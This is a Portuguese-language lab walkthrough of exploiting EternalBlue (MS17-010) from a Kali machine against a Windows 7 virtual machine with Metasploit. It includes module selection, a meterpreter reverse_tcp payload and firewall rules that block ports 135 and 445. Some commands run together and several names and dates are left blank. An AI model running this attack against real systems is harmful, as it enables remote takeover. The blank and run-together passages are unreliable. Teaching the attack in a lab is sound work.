
Guia de laboratório passo a passo demonstrando a exploração do EternalBlue (CVE-2017-0144) contra o protocolo SMB do Windows 7 usando Metasploit, incluindo etapas de configuração, exploração e mitigação.
LAB: ATAQUE AO SISTEMA OPERACIONAL WINDOWS COM BASE NA VULNERABILIDADE DO PROTOCOLO SMB.
Neste laboratório usaremos dois computadores para simular um ataque baseado na vulnerabilidade do protocolo SMB do Sistema Operacional Windows. Uma máquina executa o Sistema Operacional Kali Linux, desempenhando o papel de atacante (hacker). E um computador desempenha o papel de máquina vítima (victim). A máquina victim está executando o Sistema Operacional Windows 7 64 bits, que contém a vulnerabilidade SMB. Para fazer isso, na máquina Kali Linux usaremos o código de exploração chamado EternalBlue para atacar a máquina Windows 7.
Server Message Block (SMB) é um protocolo de compartilhamento de arquivos bastante comum na plataforma Windows da Microsoft. Graças a esse protocolo SMB, os computadores Windows conectados entre si na mesma camada de rede ou no mesmo Domain podem compartilhar arquivos entre si. Até hoje, o SMB também é conhecido como Common Internet File Sharing (CIFS).
EternalBlue é um código de exploração de informações, baseado na vulnerabilidade do protocolo SMB através da porta 445. Inicialmente, EternalBlue foi desenvolvido pela Agência de Segurança Nacional dos Estados Unidos (NSA). O nome completo em inglês é U.S. National Security Agency. Mas depois, ele foi vazado pelo grupo Hacker The Shadow Brokens em 2017. Também no mesmo ano. Uma onda de ataques em grande escala do Vírus de criptografia de dados – Ransomware, visando computadores Windows da Microsoft, ocorreu em todo o mundo. Entre eles, o mais famoso ainda é o vírus . Até hoje, embora essa vulnerabilidade tenha sido corrigida pela Microsoft com a atualização de segurança . No entanto, no mundo, um grande número de computadores executando o Sistema Operacional Windows ainda apresenta essa vulnerabilidade. Essa vulnerabilidade foi publicada em . (Windows SMB Remote Code Execution Vulnerability). Essa vulnerabilidade é extremamente perigosa e muito fácil de ser explorada. O que vale ressaltar é que para atacar através dessa vulnerabilidade do protocolo SMB. O hacker não precisa enviar ou enganar a vítima para baixar ou executar qualquer vírus malicioso. Ou seja, a vítima, mesmo sem fazer nada, ainda pode ser facilmente atacada pelo hacker, que assume o controle do computador sem que ela perceba.
Prepare 02 máquinas virtuais executando no software VMware Workstation:

Na máquina virtual Kali(attack):
ifconfigservice postgresql startservice postgresql statusNa máquina virtual Windows 7(victim):
ipconfigmsfconsole
search ms17_010
use 0 -> set payload windows/x64/meterpreter/reverse_tcp

=>Aqui, considera-se que o hacker já invadiu com sucesso a máquina victim. Nesse momento, o hacker pode apagar, roubar arquivos da máquina da vítima sem que ela perceba. Até mesmo, o hacker pode enviar e executar vírus diretamente nela.
Para evitar ser explorado e ter o protocolo SMB utilizado indevidamente. Precisamos realizar algumas tarefas a seguir:
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"